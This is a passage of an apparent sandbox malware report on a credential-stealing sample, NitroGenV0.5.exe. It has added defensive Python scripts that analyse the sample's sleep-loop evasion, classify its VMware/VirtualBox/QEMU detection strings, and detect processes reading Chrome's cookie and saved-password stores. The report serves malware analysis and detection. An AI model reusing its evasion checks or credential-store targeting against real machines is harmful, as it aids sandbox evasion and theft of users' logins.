Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Thread delayed: delay time: 99562
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Thread delayed: delay time: 99453
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Thread delayed: delay time: 99343
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Thread delayed: delay time: 99234
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Thread delayed: delay time: 99125
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Thread delayed: delay time: 99015
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Thread delayed: delay time: 98906
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Thread delayed: delay time: 98796
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Thread delayed: delay time: 98684
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Thread delayed: delay time: 99892
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Thread delayed: delay time: 99875
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Thread delayed: delay time: 99765
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Thread delayed: delay time: 99642
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Thread delayed: delay time: 99500
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Thread delayed: delay time: 99391
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Thread delayed: delay time: 99281
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Thread delayed: delay time: 99172
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Thread delayed: delay time: 99063
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Thread delayed: delay time: 98922
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Thread delayed: delay time: 98813
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Thread delayed: delay time: 98642
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Thread delayed: delay time: 99906
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Thread delayed: delay time: 99797
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Thread delayed: delay time: 922337203685477
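The delay values above are what the sandbox recorded per Sleep-style call, and read one at a time they understate the evasion: no finite call reaches the 3-minute threshold of the report's "Contains long sleeps" signature, yet the calls sum to several minutes per process, shrink by a near-constant step (consistent with a loop that re-sleeps for the remaining time, so shortening any one call does not help), and end in 922337203685477 ms, which is .NET's TimeSpan.MaxValue expressed in whole milliseconds (Int64.MaxValue ticks / 10000), i.e. an effectively infinite wait. The following Python triage script is an added example, not part of this report or of Joe Sandbox; it parses "Thread delayed" lines in this report's format (a subset of the lines above is embedded as constructed input) and computes per-process totals, infinite waits and the countdown heuristic. The 20% step tolerance is an assumption.

```python
import re
from collections import defaultdict

# Constructed sample: a subset of the "Thread delayed" evidence lines from this
# report, copied verbatim (without the "Jump to behavior" link text).
REPORT_LINES = r"""
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Thread delayed: delay time: 99781
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Thread delayed: delay time: 99671
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Thread delayed: delay time: 99562
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Thread delayed: delay time: 99453
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Thread delayed: delay time: 99875
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Thread delayed: delay time: 99765
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Thread delayed: delay time: 922337203685477
"""

# .NET TimeSpan.MaxValue is Int64.MaxValue ticks of 100 ns; in whole
# milliseconds that is 922337203685477, the value the sandbox logged above.
TIMESPAN_MAX_MS = (2**63 - 1) // 10_000
# Threshold behind the report's "Contains long sleeps (>= 3 min)" signature.
LONG_SLEEP_MS = 3 * 60 * 1000

LINE_RE = re.compile(r"^Source: (?P<proc>.+?) Thread delayed: delay time: (?P<ms>\d+)\s*$")


def parse_delays(text):
    """Return [(process_path, delay_ms), ...] in report order."""
    out = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            out.append((m.group("proc"), int(m.group("ms"))))
    return out


def is_infinite(ms):
    """True for the TimeSpan.MaxValue sentinel (an effectively unbounded wait)."""
    return ms >= TIMESPAN_MAX_MS


def is_countdown(seq, tolerance=0.2):
    """Heuristic (assumption): three or more finite delays that shrink by a
    near-constant step look like a loop re-sleeping for the remaining time
    rather than one long Sleep() call a sandbox could simply shorten."""
    if len(seq) < 3:
        return False
    steps = [b - a for a, b in zip(seq, seq[1:])]
    if any(s >= 0 for s in steps):
        return False
    return (max(steps) - min(steps)) <= tolerance * abs(min(steps))


def triage(text):
    """Per-process summary of the sleep behaviour found in report text."""
    per_proc = defaultdict(list)
    for proc, ms in parse_delays(text):
        per_proc[proc].append(ms)
    report = {}
    for proc, delays in per_proc.items():
        finite = [d for d in delays if not is_infinite(d)]
        report[proc] = {
            "calls": len(delays),
            "infinite_waits": len(delays) - len(finite),
            "total_finite_ms": sum(finite),
            "max_finite_ms": max(finite, default=0),
            "long_sleeps": sum(1 for d in finite if d >= LONG_SLEEP_MS),
            "cumulative_long": sum(finite) >= LONG_SLEEP_MS,
            "countdown": is_countdown(finite),
        }
    return report


if __name__ == "__main__":
    for proc, summary in triage(REPORT_LINES).items():
        print(proc)
        for key, value in summary.items():
            print(f"  {key}: {value}")
```

On the embedded subset, neither process has a single call of 3 minutes or more, but both exceed that cumulatively, both show the countdown pattern, and each ends in one infinite wait; a sandbox that only patches individual long Sleep calls would still lose the run to the loop.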
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe File Volume queried: C:\ FullSizeInformation
Source: NitroGenV0.5.exe.6.dr Binary or memory string: SYSTEM\CurrentControlSet\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S
Source: NitroGenV0.5.exe, 00000011.00000002.351226359.000000001C976000.00000004.00000001.sdmp Binary or memory string: VMware
Source: NitroGenV0.5.exe, 00000011.00000002.350268413.0000000002711000.00000004.00000001.sdmp Binary or memory string: ISYSTEM\CurrentControlSet\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S
Source: NitroGenV0.5.exe, 00000011.00000002.350268413.0000000002711000.00000004.00000001.sdmp Binary or memory string: KSYSTEM\CurrentControlSet\Control\CriticalDeviceDatabase\root#vmwvmcihostdev
Source: NitroGenV0.5.exe.6.dr Binary or memory string: vmware
Source: NitroGenV0.5.exe, 00000006.00000002.302148131.00000000008E2000.00000002.00020000.sdmp, NitroGenV0.5.exe, 00000011.00000002.349541770.0000000000512000.00000002.00020000.sdmp, NitroGenV0.5.exe.6.dr Binary or memory string: virtualboxvboxqemu
Source: wget.exe, 00000004.00000002.276552564.00000000009E8000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq
Source: NitroGenV0.5.exe Binary or memory string: SOFTWARE\VMWare, Inc.\VMWare Tools
Source: wget.exe, NitroGenV0.5.exe, 00000006.00000003.301890578.0000000000F23000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: NitroGenV0.5.exe, 00000006.00000002.304952361.000000001BC13000.00000004.00000001.sdmp Binary or memory string: Win32_VideoController(Standard display types)VMware2V678OLTWin32_VideoControllerGBBSEH4DVideoController120060621000000.000000-00093469586display.infMSBDAPMDL4PPYPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsE6F_LCFCaPrYY
Source: NitroGenV0.5.exe Binary or memory string: SYSTEM\CurrentControlSet\Control\CriticalDeviceDatabase\root#vmwvmcihostdev
Source: NitroGenV0.5.exe, 00000011.00000002.351226359.000000001C976000.00000004.00000001.sdmp Binary or memory string: Win32_VideoController(Standard display types)VMware2V678OLTWin32_VideoControllerGBBSEH4DVideoController120060621000000.000000-00093469586display.infMSBDAPMDL4PPYPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsE6F_LCFC
Source: NitroGenV0.5.exe, 00000011.00000002.350055756.0000000000A5C000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~
Source: NitroGenV0.5.exe, 00000011.00000002.350268413.0000000002711000.00000004.00000001.sdmp Binary or memory string: "SOFTWARE\VMWare, Inc.\VMWare Tools
Source: NitroGenV0.5.exe, 00000006.00000002.303503092.000000001BB70000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: NitroGenV0.5.exe.6.dr Binary or memory string: SYSTEM\CurrentControlSet\Control\CriticalDeviceDatabase\root#vmwvmcihostdevkSYSTEM\CurrentControlSet\Control\VirtualDeviceDriversESOFTWARE\VMWare, Inc.\VMWare ToolsUSOFTWARE\Oracle\VirtualBox Guest Additions1HARDWARE\ACPI\DSDT\VBOX_SSYSTEM\ControlSet001\Services\Disk\Enum\0cHARDWARE\Description\System\SystemBiosInformationYHARDWARE\Description\System\VideoBiosVersion]HARDWARE\Description\System\SystemManufacturer[HARDWARE\Description\System\SystemProductName[HARDWARE\Description\System\Logical Unit Id 0
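The strings above are the sample's VM-check inventory, and they are worth reading as such: the registry paths name VMware Tools, the VMCI host device, the VirtualBox Guest Additions key and the VBOX_ ACPI table, the concatenated needle "virtualboxvboxqemu" is a substring list, and the Win32_VideoController WMI output contains PCI\VEN_15AD&DEV_0405, the VMware SVGA II adapter (vendor 15AD is VMware), which is why the "Queries sensitive video device information" signature fired. One caveat: "Hyper-V RAW" next to mswsock.dll is the name of the Winsock catalog provider for Hyper-V sockets that ships on current Windows builds, so its presence in wget.exe memory as well as the sample's is Winsock initialisation rather than a VM check. The following Python classifier is an added example, not part of this report or of Joe Sandbox; it maps memory strings of the kinds listed above (copied here as constructed input, with the long WMI blob shortened to the part carrying the PCI identifier) to the hypervisor each one probes for, and flags the Hyper-V RAW string as benign. The small PCI vendor table and the rule list are assumptions sized to this report.

```python
import re
from dataclasses import dataclass

# Constructed sample: memory strings copied from the VM-detection evidence in
# this report (the Win32_VideoController blob is cut down to the PCI part).
SAMPLE_STRINGS = [
    r"SYSTEM\CurrentControlSet\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S",
    r"KSYSTEM\CurrentControlSet\Control\CriticalDeviceDatabase\root#vmwvmcihostdev",
    "virtualboxvboxqemu",
    r"Hyper-V RAW%SystemRoot%\system32\mswsock.dll",
    r"SOFTWARE\VMWare, Inc.\VMWare Tools",
    r"Win32_VideoController(Standard display types)VMware2V678OLTWin32_VideoController"
    r"PCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OK",
    r"HARDWARE\ACPI\DSDT\VBOX_",
    r"SOFTWARE\Oracle\VirtualBox Guest Additions",
    r"HARDWARE\Description\System\SystemManufacturer",
]

# PCI vendor IDs of virtual display/paravirtual devices (assumption: this table
# only needs to cover the hypervisors the report's strings refer to).
PCI_VENDORS = {
    "15AD": "VMware",       # DEV_0405 is the VMware SVGA II adapter
    "80EE": "VirtualBox",   # InnoTek Systemberatung, VirtualBox graphics
    "1AF4": "QEMU",         # Red Hat virtio devices
    "1414": "Hyper-V",      # Microsoft synthetic devices
}
PCI_RE = re.compile(r"PCI\\VEN_([0-9A-Fa-f]{4})&DEV_([0-9A-Fa-f]{4})")

# (regex, hypervisor, evidence) for registry paths and name needles.
RULES = [
    (r"Ven_VMware_", "VMware", "SCSI disk enum key with VMware vendor string"),
    (r"vmwvmcihostdev", "VMware", "VMCI host device in CriticalDeviceDatabase"),
    (r"VMWare Tools", "VMware", "VMware Tools install key"),
    (r"vmware", "VMware", "hypervisor name needle 'vmware'"),
    (r"VirtualBox Guest Additions", "VirtualBox", "Guest Additions install key"),
    (r"ACPI\\DSDT\\VBOX_", "VirtualBox", "VirtualBox ACPI DSDT table name"),
    (r"virtualbox", "VirtualBox", "hypervisor name needle 'virtualbox'"),
    (r"vbox", "VirtualBox", "hypervisor name needle 'vbox'"),
    (r"qemu", "QEMU", "hypervisor name needle 'qemu'"),
    (r"HARDWARE\\Description\\System\\(SystemBiosInformation|VideoBiosVersion|"
     r"SystemManufacturer|SystemProductName)",
     "generic", "firmware/OEM string fingerprint (value compared against hypervisor names)"),
]


@dataclass(frozen=True)
class Finding:
    hypervisor: str
    evidence: str
    category: str  # "vm-check" or "benign"


def classify(s):
    """Map one memory string to the VM checks it implies."""
    found = []
    # "Hyper-V RAW" is the Winsock catalog provider for Hyper-V sockets on
    # current Windows builds; next to mswsock.dll it is ordinary Winsock
    # initialisation (it shows up in wget.exe too), so it is not a VM check.
    if "Hyper-V RAW" in s:
        found.append(Finding("Hyper-V", "Winsock provider name 'Hyper-V RAW'", "benign"))
    for ven, dev in PCI_RE.findall(s):
        vendor = PCI_VENDORS.get(ven.upper())
        if vendor:
            found.append(Finding(vendor, f"PCI device VEN_{ven.upper()}&DEV_{dev.upper()} in WMI output", "vm-check"))
    for pattern, hypervisor, evidence in RULES:
        if re.search(pattern, s, re.IGNORECASE):
            found.append(Finding(hypervisor, evidence, "vm-check"))
    return list(dict.fromkeys(found))  # drop exact duplicates, keep order


def targeted_hypervisors(strings):
    """Hypervisors the sample actively probes for, ignoring benign strings."""
    return {f.hypervisor for s in strings for f in classify(s) if f.category == "vm-check"}


if __name__ == "__main__":
    for s in SAMPLE_STRINGS:
        for f in classify(s):
            print(f"{f.category:8} {f.hypervisor:11} {f.evidence}  <- {s[:60]}")
    print("targeted:", sorted(targeted_hypervisors(SAMPLE_STRINGS)))
```

Run over the embedded strings, the classifier reports VMware, VirtualBox and QEMU plus the generic firmware fingerprint, and nothing for Hyper-V beyond the benign Winsock string. For a sandbox operator the output doubles as a hardening checklist: every registry path, device name and PCI identifier it lists is something the guest must not expose if this sample is to run to completion.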

Anti Debugging:

Enables debug privileges
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Memory allocated: page read and write | page guard

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\wget.exe Queries volume information: C:\Users\user\Desktop\download VolumeInformation
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Queries volume information: C:\Users\user\Desktop\download\NitroGenV0.5.exe VolumeInformation
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Queries volume information: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Queries the product ID of Windows
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId
Source: C:\Windows\SysWOW64\wget.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected MercurialGrabber
Source: Yara match File source: 6.2.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.302148131.00000000008E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.280072477.00000000008E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.349541770.0000000000512000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.324764469.0000000000512000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: NitroGenV0.5.exe PID: 6784, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: NitroGenV0.5.exe PID: 7100, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\Desktop\download\NitroGenV0.5.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe, type: DROPPED
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\default\Cookies
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\default\Login Data
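The two file opens above are the whole browser-theft signature in this run: Cookies and Login Data are Chrome's SQLite stores for session cookies and saved credentials, and a process other than the browser reading both in quick succession is the cookie-plus-password pattern of a grabber (the password_value blobs are AES-encrypted with a key that Chrome keeps DPAPI-wrapped in Local State, so grabbers usually read that file as well; newer Chrome builds keep cookies under Network\Cookies). The following Python detection logic is an added example, not part of this report or of Joe Sandbox; it runs over constructed file-open events in the shape of the evidence above, alerts on any process that is not a correctly installed Chrome or Edge touching one of these stores, and summarises which store kinds each process harvested. The invented PIDs, the Edge paths and the rule that the browser image must live in its install directory are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample file-open events shaped like the report's "File opened"
# evidence: (pid, process image, target path). PIDs are invented.
EVENTS = [
    (4242, r"C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe",
           r"C:\Users\user\AppData\Local\Google\Chrome\User Data\default\Cookies"),
    (4242, r"C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe",
           r"C:\Users\user\AppData\Local\Google\Chrome\User Data\default\Login Data"),
    (4242, r"C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe",
           r"C:\Users\user\AppData\Local\Temp\out.txt"),
    (1337, r"C:\Program Files\Google\Chrome\Application\chrome.exe",
           r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    (5151, r"C:\Users\user\AppData\Local\Temp\chrome.exe",
           r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies"),
]

# Chromium-family stores under <User Data>\<profile>\..., plus Local State,
# which holds the DPAPI-wrapped AES key that protects the "v10" blobs.
STORE_RE = re.compile(
    r"\\(?:Google\\Chrome|Microsoft\\Edge)\\User Data\\"
    r"(?:[^\\]+\\(?:Network\\)?(Login Data|Cookies|Web Data)|(Local State))$",
    re.IGNORECASE,
)
STORE_KIND = {
    "login data": "passwords",
    "cookies": "cookies",
    "web data": "autofill",
    "local state": "key material",
}

# Legitimate owners: basename AND the install directory it must live in, so a
# dropper renamed to chrome.exe in %TEMP% does not get a pass.
OWNERS = [
    re.compile(r"\\Google\\Chrome\\Application\\chrome\.exe$", re.IGNORECASE),
    re.compile(r"\\Microsoft\\Edge\\Application\\msedge\.exe$", re.IGNORECASE),
]


def store_kind(path):
    """Return the kind of credential store a path points at, or None."""
    m = STORE_RE.search(path)
    if not m:
        return None
    name = (m.group(1) or m.group(2)).lower()
    return STORE_KIND[name]


def is_browser_owner(image):
    """True only for a browser binary in its expected install location."""
    return any(rule.search(image) for rule in OWNERS)


def detect(events):
    """Alert on every non-browser process that opens a browser credential store."""
    alerts = []
    for pid, image, path in events:
        kind = store_kind(path)
        if kind is None or is_browser_owner(image):
            continue
        alerts.append({"pid": pid, "image": image, "path": path, "kind": kind})
    return alerts


def harvest_summary(alerts):
    """pid -> sorted store kinds; two or more kinds from one process is the
    cookie-plus-password pattern of a grabber rather than a one-off read."""
    kinds = defaultdict(set)
    for alert in alerts:
        kinds[alert["pid"]].add(alert["kind"])
    return {pid: sorted(k) for pid, k in kinds.items()}


if __name__ == "__main__":
    found = detect(EVENTS)
    for alert in found:
        print(f"ALERT pid={alert['pid']} {alert['image']} -> {alert['kind']}: {alert['path']}")
    print(harvest_summary(found))
```

On the constructed events the legitimate chrome.exe read is ignored, the sample's two reads are reported and roll up to cookies plus passwords for one process, and the masquerading chrome.exe in %TEMP% is still caught because the owner check is on the full image path rather than the basename.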

Remote Access Functionality:

Yara detected MercurialGrabber
Source: Yara match File source: the same twelve unpacked PE, memory, process-memory and dropped-file sources listed under Stealing of Sensitive Information above